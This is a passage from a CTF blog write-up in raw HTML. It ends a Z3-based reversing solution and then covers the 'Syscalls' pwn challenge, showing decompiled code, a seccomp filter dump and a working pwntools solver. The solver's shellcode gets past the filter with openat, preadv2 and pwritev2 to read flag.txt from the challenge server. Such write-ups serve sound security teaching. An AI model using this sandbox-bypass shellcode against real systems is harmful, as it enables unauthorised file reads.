class=\"token number\">0x1093a1d</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x8bdcd2</span><span class=\"token punctuation\">)</span><span 
class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span>e <span class=\"token operator\">%</span> f <span class=\"token operator\">==</span> <span class=\"token number\">0x212c944d</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span>g <span class=\"token operator\">%</span> <span class=\"token number\">0x6e22</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x31be</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>h <span class=\"token operator\">&amp;</span> <span class=\"token number\">0xffffffff</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">%</span> A<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x2038c43c</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span>i <span class=\"token operator\">%</span> <span class=\"token number\">0x1ce628</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x1386e2</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span>j <span class=\"token operator\">%</span> <span class=\"token number\">0x1172502</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x103cf4f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span>k <span class=\"token operator\">%</span> <span class=\"token number\">0x2e16f83</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x16ab0d7</span><span class=\"token 
punctuation\">)</span>\n    <span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">if</span> s<span class=\"token punctuation\">.</span>check<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> z3<span class=\"token punctuation\">.</span>sat<span class=\"token punctuation\">:</span>\n    m <span class=\"token operator\">=</span> s<span class=\"token punctuation\">.</span>model<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>m<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this solver gives a combination of integers that satisfies the conditions, and by feeding those values to the challenge binary I was able to obtain the correct flag.</p>\n<p><img class=\"gatsby-resp-image-image\" src=\"/static/800985fe3fb0b5b5aa871569790d1d16/d9199/image-20240707150331663.png\" alt=\"image-20240707150331663\" title=\"image-20240707150331663\" /></p>\n<p>This was a problem that could have been solved quickly with dynamic analysis, but I wasted a huge amount of time because I stubbornly insisted on solving it with static analysis and Z3Py.</p>\n<p>Looking back, it was very easy, but once you fall into a strange mental trap, it is hard to get out of it right away.</p>\n<h2 id=\"syscallspwn\" style=\"position:relative;\"><a href=\"#syscallspwn\" aria-label=\"syscallspwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Syscalls(Pwn)</h2>\n<p>The challenge binary has NX disabled.</p>\n<p><img class=\"gatsby-resp-image-image\" src=\"/static/46d54d0c3d0533113e47cfe4c9345e98/442cb/image-20240708181828507.png\" alt=\"image-20240708181828507\" title=\"image-20240708181828507\" /></p>\n<p>When I decompiled the binary, I found that it executes the region containing the 0xb0 bytes read from standard input as code.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">void</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">long</span> in_FS_OFFSET<span class=\"token punctuation\">;</span>\n  undefined input_code <span class=\"token punctuation\">[</span><span class=\"token number\">184</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> local_10<span class=\"token punctuation\">;</span>\n  \n  local_10 <span class=\"token operator\">=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span 
class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token number\">0x0</span><span class=\"token punctuation\">,</span><span class=\"token number\">2</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stderr</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token number\">0x0</span><span class=\"token punctuation\">,</span><span class=\"token number\">2</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token number\">0x0</span><span class=\"token punctuation\">,</span><span class=\"token number\">2</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">get_code</span><span class=\"token punctuation\">(</span>input_code<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  seccomp<span class=\"token 
operator\">-</span><span class=\"token function\">install</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">run_code</span><span class=\"token punctuation\">(</span>input_code<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>local_10 <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n                    <span class=\"token comment\">/* WARNING: Subroutine does not return */</span>\n    <span class=\"token function\">__stack_chk_fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">get_code</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>param_1<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span>\n      <span class=\"token string\">\"The flag is in a file named flag.txt located in the same directory as this binary. 
That\\'s al l the information I can give you.\"</span>\n      <span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>param_1<span class=\"token punctuation\">,</span><span class=\"token number\">0xb0</span><span class=\"token punctuation\">,</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">run_code</span><span class=\"token punctuation\">(</span>code <span class=\"token operator\">*</span>param_1<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token punctuation\">(</span><span class=\"token operator\">*</span>param_1<span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>If that were all, exploiting it would look easy, but unfortunately this code installs a seccomp filter after receiving the input, and we can see that system calls such as <code class=\"language-text\">execve</code>, <code class=\"language-text\">execveat</code>, <code class=\"language-text\">fork</code>, <code class=\"language-text\">open</code>, <code class=\"language-text\">read</code>, and <code class=\"language-text\">write</code> are all prohibited.</p>\n<p>Reference: <a href=\"/ctf-pwn-gachi-rop-en\">Pwn Super Intro 2 for Beginner CTFers - Bypassing seccomp and Shellcode Basics -</a></p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code 
class=\"language-c\"><span class=\"token keyword\">int</span> seccomp<span class=\"token operator\">-</span><span class=\"token function\">install</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> iVar1<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> in_FS_OFFSET<span class=\"token punctuation\">;</span>\n  undefined2 local_e8 <span class=\"token punctuation\">[</span><span class=\"token number\">4</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  undefined8 <span class=\"token operator\">*</span>local_e0<span class=\"token punctuation\">;</span>\n  undefined8 local_d8<span class=\"token punctuation\">;</span>\n  undefined8 local_d0<span class=\"token punctuation\">;</span>\n  undefined8 local_c8<span class=\"token punctuation\">;</span>\n  undefined8 local_c0<span class=\"token punctuation\">;</span>\n  undefined8 local_b8<span class=\"token punctuation\">;</span>\n  undefined8 local_b0<span class=\"token punctuation\">;</span>\n  undefined8 local_a8<span class=\"token punctuation\">;</span>\n  undefined8 local_a0<span class=\"token punctuation\">;</span>\n  undefined8 local_98<span class=\"token punctuation\">;</span>\n  undefined8 local_90<span class=\"token punctuation\">;</span>\n  undefined8 local_88<span class=\"token punctuation\">;</span>\n  undefined8 local_80<span class=\"token punctuation\">;</span>\n  undefined8 local_78<span class=\"token punctuation\">;</span>\n  undefined8 local_70<span class=\"token punctuation\">;</span>\n  undefined8 local_68<span class=\"token punctuation\">;</span>\n  undefined8 local_60<span class=\"token punctuation\">;</span>\n  undefined8 local_58<span class=\"token punctuation\">;</span>\n  undefined8 local_50<span class=\"token punctuation\">;</span>\n  undefined8 
local_48<span class=\"token punctuation\">;</span>\n  undefined8 local_40<span class=\"token punctuation\">;</span>\n  undefined8 local_38<span class=\"token punctuation\">;</span>\n  undefined8 local_30<span class=\"token punctuation\">;</span>\n  undefined8 local_28<span class=\"token punctuation\">;</span>\n  undefined8 local_20<span class=\"token punctuation\">;</span>\n  undefined8 local_18<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> local_10<span class=\"token punctuation\">;</span>\n  \n  local_10 <span class=\"token operator\">=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  local_d8 <span class=\"token operator\">=</span> <span class=\"token number\">0x400000020</span><span class=\"token punctuation\">;</span>\n  local_d0 <span class=\"token operator\">=</span> <span class=\"token number\">0xc000003e16000015</span><span class=\"token punctuation\">;</span>\n  local_c8 <span class=\"token operator\">=</span> <span class=\"token number\">0x20</span><span class=\"token punctuation\">;</span>\n  local_c0 <span class=\"token operator\">=</span> <span class=\"token number\">0x4000000001000035</span><span class=\"token punctuation\">;</span>\n  local_b8 <span class=\"token operator\">=</span> <span class=\"token number\">0xffffffff13000015</span><span class=\"token punctuation\">;</span>\n  local_b0 <span class=\"token operator\">=</span> <span class=\"token number\">0x120015</span><span class=\"token punctuation\">;</span>\n  local_a8 <span class=\"token operator\">=</span> <span class=\"token number\">0x100110015</span><span class=\"token 
punctuation\">;</span>\n  local_a0 <span class=\"token operator\">=</span> <span class=\"token number\">0x200100015</span><span class=\"token punctuation\">;</span>\n  local_98 <span class=\"token operator\">=</span> <span class=\"token number\">0x11000f0015</span><span class=\"token punctuation\">;</span>\n  local_90 <span class=\"token operator\">=</span> <span class=\"token number\">0x13000e0015</span><span class=\"token punctuation\">;</span>\n  local_88 <span class=\"token operator\">=</span> <span class=\"token number\">0x28000d0015</span><span class=\"token punctuation\">;</span>\n  local_80 <span class=\"token operator\">=</span> <span class=\"token number\">0x39000c0015</span><span class=\"token punctuation\">;</span>\n  local_78 <span class=\"token operator\">=</span> <span class=\"token number\">0x3b000b0015</span><span class=\"token punctuation\">;</span>\n  local_70 <span class=\"token operator\">=</span> <span class=\"token number\">0x113000a0015</span><span class=\"token punctuation\">;</span>\n  local_68 <span class=\"token operator\">=</span> <span class=\"token number\">0x12700090015</span><span class=\"token punctuation\">;</span>\n  local_60 <span class=\"token operator\">=</span> <span class=\"token number\">0x12800080015</span><span class=\"token punctuation\">;</span>\n  local_58 <span class=\"token operator\">=</span> <span class=\"token number\">0x14200070015</span><span class=\"token punctuation\">;</span>\n  local_50 <span class=\"token operator\">=</span> <span class=\"token number\">0x1405000015</span><span class=\"token punctuation\">;</span>\n  local_48 <span class=\"token operator\">=</span> <span class=\"token number\">0x1400000020</span><span class=\"token punctuation\">;</span>\n  local_40 <span class=\"token operator\">=</span> <span class=\"token number\">0x30025</span><span class=\"token punctuation\">;</span>\n  local_38 <span class=\"token operator\">=</span> <span class=\"token number\">0x3000015</span><span class=\"token 
punctuation\">;</span>\n  local_30 <span class=\"token operator\">=</span> <span class=\"token number\">0x1000000020</span><span class=\"token punctuation\">;</span>\n  local_28 <span class=\"token operator\">=</span> <span class=\"token number\">0x3e801000025</span><span class=\"token punctuation\">;</span>\n  local_20 <span class=\"token operator\">=</span> <span class=\"token number\">0x7fff000000000006</span><span class=\"token punctuation\">;</span>\n  local_18 <span class=\"token operator\">=</span> <span class=\"token number\">6</span><span class=\"token punctuation\">;</span>\n  local_e0 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>local_d8<span class=\"token punctuation\">;</span>\n  local_e8<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">0x19</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x26</span><span class=\"token punctuation\">,</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  iVar1 <span class=\"token operator\">=</span> <span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x16</span><span class=\"token punctuation\">,</span><span class=\"token number\">2</span><span class=\"token punctuation\">,</span>local_e8<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token 
punctuation\">(</span>local_10 <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n                    <span class=\"token comment\">/* WARNING: Subroutine does not return */</span>\n    <span class=\"token function\">__stack_chk_fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> iVar1<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p><img src=\"/static/eb6afb261af8a1d19db7ef65697a39bf/f941f/image-20240708182346883.png\" alt=\"image-20240708182346883\" title=\"image-20240708182346883\" loading=\"lazy\" /></p>\n<p>In this seccomp filter, the part below is particularly interesting.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"> 0017: 0x15 0x00 0x05 0x00000014  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>A <span class=\"token operator\">!=</span> writev<span class=\"token punctuation\">)</span> goto 0023\n 0018: 0x20 0x00 0x00 0x00000014  A <span class=\"token operator\">=</span> fd <span class=\"token operator\">>></span> <span class=\"token number\">32</span> <span class=\"token comment\"># writev(fd, vec, vlen)</span>\n 0019: 0x25 0x03 0x00 0x00000000  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>A <span class=\"token operator\">></span> 0x0<span class=\"token punctuation\">)</span> goto 0023\n 0020: 0x15 0x00 0x03 0x00000000  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>A <span class=\"token operator\">!=</span> 0x0<span class=\"token punctuation\">)</span> goto 0024\n 0021: 0x20 0x00 0x00 0x00000010  A <span class=\"token operator\">=</span> fd <span class=\"token comment\"># writev(fd, vec, vlen)</span>\n 0022: 0x25 0x00 0x01 0x000003e8  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>A <span class=\"token operator\">&lt;=</span> 0x3e8<span class=\"token punctuation\">)</span> goto 0024\n 0023: 0x06 0x00 0x00 0x7fff0000  <span class=\"token builtin class-name\">return</span> ALLOW\n 0024: 0x06 0x00 0x00 0x00000000  <span class=\"token builtin class-name\">return</span> 
KILL</code></pre></div>\n<p>When the invoked system call is <code class=\"language-text\">writev</code>, the filter does not simply forbid it. Instead, it inspects the <code class=\"language-text\">fd</code> argument and allows the call only when the descriptor is larger than <code class=\"language-text\">0x3e8</code>; for any smaller descriptor, standard output included, the process is killed.</p>\n<h3 id=\"solution-1-using-openat-preadv2-and-pwritev2-with-an-iovec\" style=\"position:relative;\"><a href=\"#solution-1-using-openat-preadv2-and-pwritev2-with-an-iovec\" aria-label=\"solution 1 using openat preadv2 and pwritev2 with an iovec permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Solution 1: Using openat, preadv2, and pwritev2 with an iovec</h3>\n<p>Let’s think about how to exploit the binary while bypassing the seccomp filter in this challenge.</p>\n<p>In this binary, <code class=\"language-text\">open</code> is prohibited, but <code class=\"language-text\">openat</code> is not, so it looks like we can use it to obtain a file descriptor.</p>\n<p>Also, <code class=\"language-text\">preadv2</code> and <code class=\"language-text\">pwritev2</code>, which can serve as alternatives to <code class=\"language-text\">read</code> and <code class=\"language-text\">write</code> for retrieving the flag, do not seem to be prohibited.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token 
string\">&lt;sys/uio.h></span></span>\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">readv</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">iovec</span> <span class=\"token operator\">*</span>iov<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> iovcnt<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">writev</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">iovec</span> <span class=\"token operator\">*</span>iov<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> iovcnt<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">preadv</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">iovec</span> <span class=\"token operator\">*</span>iov<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> iovcnt<span class=\"token punctuation\">,</span> <span class=\"token class-name\">off_t</span> offset<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">pwritev</span><span class=\"token punctuation\">(</span><span 
class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">iovec</span> <span class=\"token operator\">*</span>iov<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> iovcnt<span class=\"token punctuation\">,</span> <span class=\"token class-name\">off_t</span> offset<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">preadv2</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">iovec</span> <span class=\"token operator\">*</span>iov<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> iovcnt<span class=\"token punctuation\">,</span> <span class=\"token class-name\">off_t</span> offset<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> flags<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">pwritev2</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">iovec</span> <span class=\"token operator\">*</span>iov<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> iovcnt<span class=\"token punctuation\">,</span> <span class=\"token class-name\">off_t</span> offset<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> flags<span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Reference: <a href=\"https://manpages.debian.org/testing/manpages-dev/preadv2.2.en.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">preadv2(2) — manpages-dev — Debian testing — Debian Manpages</a></p>\n<p>Reference: <a href=\"https://x64.syscall.sh/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">x64.syscall.sh</a></p>\n<p>Reference: <a href=\"https://ptr-yudai.hatenablog.com/entry/2019/09/20/111309\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">SEC-T CTF 2019 Writeup - Let’s Do CTF</a></p>\n<p><code class=\"language-text\">preadv</code> and <code class=\"language-text\">pwritev</code>, which this binary also prohibits, are system calls that read into or write from the buffers described by <code class=\"language-text\">iov</code>, a pointer to an array of <code class=\"language-text\">iovec</code> structures.</p>\n<p>Apart from spreading the data over multiple buffers via <code class=\"language-text\">iov</code> and taking an explicit file offset, they behave the same as <code class=\"language-text\">read</code> and <code class=\"language-text\">write</code>.</p>\n<p><code class=\"language-text\">preadv2</code> and <code class=\"language-text\">pwritev2</code> are extensions of those system calls. The differences are that they add a <code class=\"language-text\">flags</code> argument that modifies the behavior of each call, and that if <code class=\"language-text\">-1</code> is passed as the offset, the current file offset 
is used.</p>\n<blockquote>\n<p>These system calls are similar to preadv() and pwritev() calls, but add a fifth argument, flags, which modifies the behavior on a per-call basis.</p>\n<p>Unlike preadv() and pwritev(), if the offset argument is -1, then the current file offset is used and updated.</p>\n</blockquote>\n<p>Reference: <a href=\"https://manpages.debian.org/testing/manpages-dev/preadv2.2.en.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">preadv2(2) — manpages-dev — Debian testing — Debian Manpages</a></p>\n<p>Reference: <a href=\"https://ja.manpages.org/preadv/2\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">man preadv (2): reading and writing multiple buffers</a></p>\n<p>A solver using these system calls can be implemented as follows.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\ncontext<span class=\"token punctuation\">.</span>binary <span class=\"token operator\">=</span> exe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span><span class=\"token string\">'./syscalls'</span><span class=\"token punctuation\">)</span>\n\ncode<span class=\"token operator\">=</span><span class=\"token triple-quoted-string string\">\"\"\"\n// openat(AT_FDCWD(-100), file, 0)\nmov rdi, -100\nlea rsi, [rip+filename] \nmov rdx, 0           \nmov rax, 257             \nsyscall                  \n\n// preadv2(fd, iov, 1, 0, 0)\nxor r10, r10\nxor r8, r8\nmov rdi, rax\npush 0x100\nmov r15, rsp\nadd r15, 0x100\npush r15\nmov rsi, rsp\nmov rdx, 1\nmov rax, 327\nsyscall\n\n// pwritev2(1, iov, 1, -1, 0)\nxor r8, r8\nmov r10, -1\nmov rdi, 1  \nmov rdx, 1\nmov rsi, rsp\nmov rax, 328               \nsyscall              \n\nfilename:\n    .string \"./flag.txt\"\n\"\"\"</span>\n\nshellcode <span class=\"token 
operator\">=</span> asm<span class=\"token punctuation\">(</span>code<span class=\"token punctuation\">)</span>\n\ntarget <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"syscalls.chal.uiuc.tf\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1337</span><span class=\"token punctuation\">,</span> ssl<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>sendlineafter<span class=\"token punctuation\">(</span><span class=\"token string\">\"you.\"</span><span class=\"token punctuation\">,</span> shellcode<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>In the first section, setting the first argument to <code class=\"language-text\">AT_FDCWD(-100)</code> allows it to obtain the file descriptor for <code class=\"language-text\">./flag.txt</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\"><span class=\"token operator\">/</span><span class=\"token operator\">/</span> openat(AT_FDCWD(<span class=\"token operator\">-</span><span class=\"token number\">100</span>), file, <span class=\"token number\">0</span>)\nmov <span class=\"token register variable\">rdi</span>, <span class=\"token operator\">-</span><span class=\"token number\">100</span>\nlea <span class=\"token register variable\">rsi</span>, <span class=\"token operator\">[</span>rip<span class=\"token operator\">+</span>filename<span class=\"token operator\">]</span> \nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">0</span>           \nmov <span class=\"token register variable\">rax</span>, <span class=\"token number\">257</span>  
           \nsyscall      </code></pre></div>\n<p>In the following blocks, <code class=\"language-text\">preadv2</code> reads the flag from the file into the buffer described by the <code class=\"language-text\">iovec</code>, and <code class=\"language-text\">pwritev2</code> writes that buffer to standard output.</p>\n<p>Running this solver allows you to obtain the flag as shown below.</p>\n<p><img src=\"/static/634e36dbdbc777849eb0a82130803e5b/d9199/image-20240708223240998.png\" alt=\"image-20240708223240998\" title=\"image-20240708223240998\" loading=\"lazy\" /></p>\n<h3 id=\"solution-2-using-openat-mmap-and-pwritev2-with-an-iovec\" style=\"position:relative;\"><a href=\"#solution-2-using-openat-mmap-and-pwritev2-with-an-iovec\" aria-label=\"solution 2 using openat mmap and pwritev2 with an iovec permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 